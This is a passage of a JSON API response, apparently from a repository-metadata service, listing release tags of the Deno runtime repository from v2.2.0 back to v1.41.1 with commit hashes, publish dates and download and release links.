api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.e